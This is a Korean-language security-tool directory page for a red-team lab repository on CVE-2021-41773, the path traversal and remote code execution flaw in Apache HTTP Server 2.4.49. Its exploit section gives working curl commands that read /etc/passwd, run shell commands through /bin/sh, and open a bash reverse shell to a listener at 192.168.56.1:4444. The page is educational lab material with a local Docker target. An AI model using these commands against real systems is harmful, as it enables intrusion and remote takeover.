Skip to content
KitploitKITPLOIT
도구블로그
제출
도구블로그
제출

해킹, 침투 테스트 및 사이버 보안 도구를 당신의 보안 무기고에!

Kitploit은 해킹, 사이버 보안 및 침투 테스트 도구 디렉토리입니다. 최신 프로젝트 업데이트를 발견하여 취약점을 찾고, 시스템을 분석하고, 테스트를 자동화하고, 보안을 강화하세요.

··피드·문의·개인정보·© 2026 Kitploit

도구 디렉토리

카테고리

모든 카테고리 보기
Loading categories
도구/GitHubGitHub/sobanahmed6061/cve-2021-41773-redteam
Vulnerability AnalysisExploitationWeb Application ExploitationPenetration TestingLearning & EducationLabs & Practice
GitHubsobanahmed6061/cve-2021-41773-redteam

CVE-2021-41773-RedTeam

Apache 2.4.49 경로 탐색 RCE

저장소 보기
15개월 전아직 검토되지 않음

인기

모두 보기 →

커뮤니티에서 가장 많이 사용되는 도구를 찾아보세요.

모든 도구 탐색

도구 컬렉션을 둘러보세요

모든 도구 보기 →
공유

CVE-2021-41773 — Apache HTTP Server 2.4.49 경로 탐색 / RCE

ITSOLERA 사이버보안 부서 — 레드팀 임무 #3
팀: Offensive Team Zeta
날짜: 2026년 3월 18일


⚠️ 면책 고지

이 저장소는 교육 목적으로만 제공됩니다.
모든 테스트는 격리된 로컬 Docker 랩에서 수행되었습니다.
실제 운영 중인 시스템, 프로덕션 시스템 또는 제3자 시스템에 사용하지 마십시오.


CVE 요약

필드세부 정보
CVE IDCVE-2021-41773
CVSS9.8 CRITICAL
영향받는 버전Apache HTTP Server 2.4.49만 해당
유형경로 탐색 + 원격 코드 실행
수정 버전Apache 2.4.51

저장소 구성

파일설명
poc_41773.pyTeam Zeta 배너가 포함된 Python PoC 익스플로잇 스크립트
docker-compose.yml취약한 랩 환경 구성
offensive_zeta_shell.txt라이브 세션 로그 — 익스플로잇 증거
screenshots/증거 스크린샷
Offensive_Team_Zeta_FINAL_Report.pdf전체 익스플로잇 보고서

랩 설정

root@kitploit:~
# 취약한 이미지 가져오기
sudo docker pull blueteamsteve/cve-2021-41773:with-cgid

# 랩 시작
docker-compose up -d

# Apache 2.4.49 실행 확인
curl -I http://localhost:8080/
# 다음이 표시되어야 함: Server: Apache/2.4.49

익스플로잇

root@kitploit:~
# 경로 탐색을 통한 파일 읽기
curl --path-as-is \
    'http://localhost:8080/cgi-bin/.%2e/.%2e/.%2e/.%2e/etc/passwd'

# 원격 코드 실행
curl --path-as-is \
    -d 'echo Content-Type: text/plain; echo; id' \
    'http://localhost:8080/cgi-bin/.%2e/.%2e/.%2e/.%2e/bin/sh'

# 리버스 셸 (IP를 자신의 머신 IP로 교체)
curl --path-as-is \
    -d "echo Content-Type: text/plain; echo; bash -c 'bash -i >& /dev/tcp/192.168.56.1/4444 0>&1'" \
    "http://localhost:8080/cgi-bin/.%2e/.%2e/.%2e/.%2e/bin/sh"

참고 자료

  • https://nvd.nist.gov/vuln/detail/CVE-2021-41773
  • https://www.exploit-db.com/exploits/50383
  • https://httpd.apache.org/security/vulnerabilities_24.html
도구 다운로드